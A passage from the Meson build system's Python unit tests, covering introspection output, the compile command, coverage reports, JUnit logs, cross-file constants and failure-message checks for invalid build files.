if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
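        # Target introspection from the source tree should match the result
        # from a configured build, after normalising fields that are only
        # known at configure time.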
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
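        # --ast introspection should produce a well-formed JSON AST; walk it
        # and validate every node against the expected shapes.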
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
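            # Recursively validate a single AST node (and its children)
            # against the schema described in 'nodes' below.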
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
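        # --scan-dependencies on the source tree should report every
        # dependency() call, including conditional ones and fallbacks.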
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
        # Regression test: a spurious reconfigure was happening when the build
        # directory is inside the source directory.
        # See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
        # During the first configure the file did not exist, so no dependency
        # should have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
        # During the reconfigure the file did exist, but it is inside the build
        # directory, so no dependency should have been set. A rebuild should not
        # trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
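        # Configure and run the tests, then validate the generated JUnit XML
        # log against the bundled schema.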
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
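        # Assert that the requested coverage reports were generated in
        # meson-logs.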
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
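        # [constants] defined in an earlier machine file should be usable in
        # later files and in other sections.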
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '235 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '82 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
        Assert that running meson configure on the specified @contents raises
        an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
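        # Write a meson.build with the given contents and return the output
        # of configuring it.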
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
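# Regression check for the issue linked above: vcs_tag() should not emit a
# FeatureNew warning about custom_target's build_always_stale argument.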
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
